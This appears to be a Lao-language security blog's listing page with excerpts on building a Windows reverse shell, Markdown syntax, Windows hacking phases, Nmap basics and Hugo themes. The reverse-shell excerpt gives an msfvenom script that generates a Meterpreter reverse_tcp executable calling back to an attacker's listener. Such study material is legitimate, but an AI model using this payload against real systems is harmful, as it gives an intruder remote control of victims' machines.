Windows reverse shell using DDE (Study case) I. generate reverse shell as .exe file In Kali linux generate shell with msfvenom ສ້າງ file ພ້ອມກັບ copy code ລຸ່ມນີ້ໄປໃສ່ $ touch gen.sh #!/bin/sh msfvenom -p windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 -f exe -o $3 ອະທິບາຍ code body { font-family: saysettha_mx; } th, td { border: 1px solid black; border-collapse: collapse; text-align:center; } table { width: 100%; } words Meaning $1 ໃສ່ Listening IP address (ເຄື່ອງ Hacker ຖ້າຮັບ shell) $2 ໃສ່ Listening Port number (ເຄື່ອງ Hacker ຖ້າຮັບ shell) $3 ຊື່ໄຟລ໌
Header ຫົວຂໍ້ (<== This is H1) # h1 ## h2 ### h3 #### h4 ##### h5 ###### h6 ໝາຍເຫດ: heading1 ແລະ heading2 ສາມາດຂຽນອີກແບບດັ່ງລຸ່ມນີ້ Text to display ========= ດ້ານເທິງແມ່ນ heading1 ດ້ານລຸ່ມນີ້ແມ່ນ heading2 Text to display --------- Separator ຫຼື ເສັ້ນຂັ້ນ --- or ---------- or ------------------ ຫຼື *** or ********** or ****************** ສຳລັບ paragraph just type anything you want and use double space after . to newline. hello world my name is Souksakhone Sengsaya.
Windows Hacking (Client of the system) Information gathering Phishing Social Engineering RED teaming Discovery Ports, Services Users (For enumeration) Gaining access Enumeration User (getting user login info) Getting user’s Shell (bind shell, reverse shell) Privilege escalation priv escalation (online exploit, overflow, etc) Post exploitation leave backdoor PS: after get user shell, we can use these command to download files (Only work with the system that has Powershell) System.
What is Nmap? Nmap ແມ່ນເຄື່ອງມື Open source ທີ່ໃຊ້ໄວ້ເພື່ອຄົ້ນຫາ ແລະ ວິເຄາະຄວາມປອດໄພຂອງລະບົບ. ເປັນເຄື່ອງມືທີ່ຖືກໃຊ້ຫຼາຍບໍ່ວ່າຈະເປັນ SysAdmin, Pen-tester, Developer. Nmap ເປັນເຄືອງມືທີ່ສາມາດຣັນໄດ້ໃນຫຼາຍໆລະບົບປະຕິບັດການບໍ່ວ່າຈະເປັນ: Windows, MacOS, Linux, BSD. Port Scanning? ຕາມຊື່ແຫຼະເນາະ ໃຊ້ເພື່ອ scan ຫາ Port ພາຍໃນ Server ເປົ້າໝາຍ. ເພື່ອທີ່ເຮົາຈະໄດ້ຮູ້ວ່າພາຍໃນ Server ມີ Service ໃດທີ່ໃຫ້ບໍລິການຢູ່ ແລະ Port ນັ້ນມີສະຖານະແນວໃດ Open, Close, Filter. (ໝາຍເຫດ: ການໃຊ້ Nmap scan ນີ້ແມ່ນໝາຍເຖິງການເຮັດ Active recon ເພາະທາງໂຕ Nmap ແມ່ນຈະໄດ້ສົ່ງ SYN ໄປຫາ server ເພື່ອທີ່ຈະລໍຖ້າຮັບ SYN-ACK ຈາກ Service ພາຍໃນ server ນັ້ນໆ) ເອົາງ່າຍໆກໍຄື Active == ແຕະຕ້ອງເປົ້າໝາຍໃນທາງໃດໜຶ່ງ, Passive == ໃຊ້ຫຼັກການພວກ OSINT (google hacking database, dork) Port state ດັ່ງທີ່ໄດ້ເວົ້າຈາກດ້ານເທິງນີ້ Port ຈະມີຢູ່ 3 ສະຖານະໄດ້ແກ່: OPEN : ໝາຍວ່າ Application ຫຼື Service ນັ້ນໆແມ່ນໃຫ້ບໍລິການຢູ່ແບບເປີດ, ມີການຮັບ-ສົ່ງ connections && traffic ຕ່າງໆຢູ່ CLOSED : ແປຕາມຕົງກະຄືມີ Port ນີ້ ແຕ່ທາງ server ປິດ port ນີ້ຢູ່ Filter : ຄິດສະວ່າມັນມີ Firewall ກັນຢູ່ລະ Basic Command of Nmap Basic scan -sT TCP Connect scan -sS SYN scan -sU UDP Connect scan -sV Version scan -O OS scan Probing scan (-Px) -Pn: Don’t ping the host, ໃຊ້ກັບ host ທີ່ block ping.
Coding be like print "Hello world"var thanos = require('thanos-js'); cout>>"Hello World";
Introduction This tutorial will show you how to create a simple theme in Hugo. I assume that you are familiar with HTML, the bash command line, and that you are comfortable using Markdown to format content. I’ll explain how Hugo uses templates and how you can organize your templates to create a theme. I won’t cover using CSS to style your theme. We’ll start with creating a new site with a very basic template.